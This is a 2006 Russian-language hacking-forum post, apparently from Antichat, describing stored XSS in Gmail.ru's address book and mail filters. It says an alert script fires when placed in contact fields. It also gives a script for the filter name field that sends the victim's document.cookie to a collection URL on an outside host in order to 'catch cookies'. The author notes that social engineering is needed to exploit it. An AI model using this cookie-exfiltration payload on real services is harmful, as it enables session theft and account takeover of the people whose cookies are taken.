XSS в Gmail.ru (алерт в адресной книге)

Discussion in 'Уязвимости Mail-сервисов' started by _kREveDKo_, 14 Apr 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    XSS в Gmail.ru (в адресной книге и фильтрах)

    Заходим в адресную книгу и забиваем доволи знакомый скрипт алерта в поле для имени, домашнего телефона и места работы. При просмотре списка контактов Xss идёт в работу. Хотя больше чем алерт я оттуда не выжал =( Да и без соцИнж не обойтись =( Короче - шалость такая =)



    А при создании нового фильтра в названии вбиваем любимый
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> И ловим кукисы... =) И опять тут без соц инженерии никуда =)
     
    #1 _kREveDKo_, 14 Apr 2006
    Last edited: 15 Apr 2006
    2 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.